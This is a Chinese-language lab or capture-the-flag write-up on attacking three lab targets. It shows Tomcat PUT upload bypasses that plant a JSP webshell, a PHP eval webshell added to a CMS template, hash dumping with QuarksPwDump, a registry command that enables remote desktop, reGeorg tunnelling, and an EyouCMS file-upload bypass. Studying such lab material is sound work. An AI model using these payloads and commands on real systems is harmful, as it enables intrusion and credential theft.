第一个
172.168.20.167
首先环境搭建
docker-compose build
docker-compose up -d
运行完成后访问 http://172.168.20.167:8080 即可看到Tomcat的Example页面。
三种上传绕过方式:
- 第一个:PUT /xxx.jsp%20
- 第二个:PUT /xxx.jsp::$DATA
- 第三个为:PUT /xxx.jsp/
然后我们用exp来验证一下是否存在漏洞
以put方式写入222.jsp,然后就是我的ip地址要对应上
看到返回响应码400,说明失败了,重新检查,直到看到204,说明成功了
构造一个payload看看是否真的能够执行
http://172.168.20.167:8080/222.jsp?pwd=023&cmd=whoamihttp://172.168.20.167:8080/222.jsp?pwd=023&cmd=whoami
既然已经验证完能够上传,那让我们上传个jsp一句话木马获取权限。这里我用的是哥斯拉生成的一句话木马。写入的地方就是Content-Length: 537以下的地方,在那里插shell。
然后用哥斯拉连接看看就表示成功了
第二个
首先打开网址界面如下:
点击登录,进行用户登录:
渗透过程
- 获取webshell
在r=后输入admin找到后台登录页面
(2)输入账号密码登录后台
(3)点击管理模板文件
(4)编辑index_index.php文件
(5)在头部添加<?php @eval($_REQUEST[666]);?>一句话木马,保存
(6)在主页url后加?666=phpinfo();成功显示
(7)然后用蚁剑连接,获取更多权限
(8)上传QuarksPwDump.exe,
在终端输入C:\phpStudy2013\WWW\QuarksPwDump.exe --dump-hash-local获取密码
- 通过cmd5解码,账户名:Administrator 密码:Hallo
- 接下来尝试远程登录。
首先在终端输入netstat -ano,发现3389端口未开启。
开启3386端口命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
(10)尝试远程登录。
- 通过上面破解的账号密码,远程登录
- 拿到flag1
进入外网后,收集有用信息。
结果发现xshell4新建会话有IP 和用户名。
尝试ping一下这个ip,可以ping通。
接下来尝试爆破密码。
通过蚁剑往win上传reGeorg-master/tunnel.nosocker.php
物理机访问 http://192.168.100.130/tunnel.nosocher.php
- 接下来打开kali,运行reGeorg-master
第三个
172.168.20.208
(1)打开界面:
(2)打开待测试的EyouCMS网站,在登录页面输入正确的账户名和密码,登录到后台管理界面。
(3)然后开启burp抓包,构建如下的包
需要改两方面的参数一是referer,改成我们访问的页面
然后将get的url构造为如下
- 使用BP,拦截一次文件上传请求,并将该请求保存至本地,将其中的上传文件名修改为"test.php"。
(5)修改请求头中的Content-Type参数为"1.jpg",并重新发送该请求。
- 在服务器端检查上传目录下是否出现了名为"test.php"的文件。
(7)文件上传成功后,验证漏洞是否存在。
(8)然后放进sqlmap一把梭就行啦